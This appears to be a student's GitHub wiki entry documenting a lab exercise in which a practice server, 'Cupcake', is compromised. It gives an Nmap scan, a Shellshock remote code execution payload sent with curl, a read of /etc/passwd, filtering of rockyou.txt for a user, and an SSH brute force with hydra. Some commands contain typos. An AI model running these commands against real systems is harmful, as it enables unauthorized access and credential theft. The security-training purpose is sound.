Activity 4.1 Exploiting Cupcake Technical Journal - Foren-Ken/tech-journal GitHub Wiki

Exploiting Cupcake (Server) required the following steps.

1. Recon

  • Service Version Detection: Using Nmap, it is possible to discoverer the services and the version of said services. nmap -sT --top-ports [number of common ports to select] -sV [host ip address]. The flag -sV is the service scanning flag and provides a deeper look into the services on a specific host.

The Nmap guide can be referenced more options.

2. Developing a Knowledge Base

  • Utilizing nmaptocsv: This tool simply takes a grep-able output from nmap and adds delimiters to create a CSV file. nmaptocsv -i [input file] -d [delimiter choice (the divider between items in the csv file)]. The output can be copied and pasted into any sheets software, but ensure that the little clipboard icon is selected to divide the entries according to the delimiter.

The Nmap guide contains more on nmaptocsv.

3. Vulnerability Detection

  • This topic is highly dependent on research into the findings of the recon. In the case of Activity 4.1, we were given the vulnerability but this generosity is not expected for future assignments.

4. Remote Code Execution

  • ShellShock Vulnerability: This bug is being used in the lab to send bash scripts to the target. This is done by sending three parts, a valid header, an legitimate function, and BASH to be executed. curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' http://host/[Vulnerable Area]

The ShellShock Guide provides a more in-depth look at ShellShock.

5. Developing a foothold

  • Password Generation After gaining access using the remote code execution, I was able to use the command /bin echo "$(< /etc/paswd)" to gain access to the /etc/passd file. This contains information on each account on the device, and the only normal looking account is "Samwise". Using this information, the rockyou.txt was parsed with the following command: cat rockyou.txt | grep -i "samwise" > potentialpass.txt
  • SSH Brute Force With a list of potential passwords, the host, and the target account it became simple to use the tool "hydra" to brute force a connection. This was done with the following command. hydra -l [account name] -P [password list] [target IP] -t 4 ssh.

The Hydra Guide contains more information on hydra and it's usage.

6. Gaining Root

  • This part was skipped in the lab. Will be done in the future. Also, we dont have access to reset the server, which would make it so we destroy it for everyone else after completing.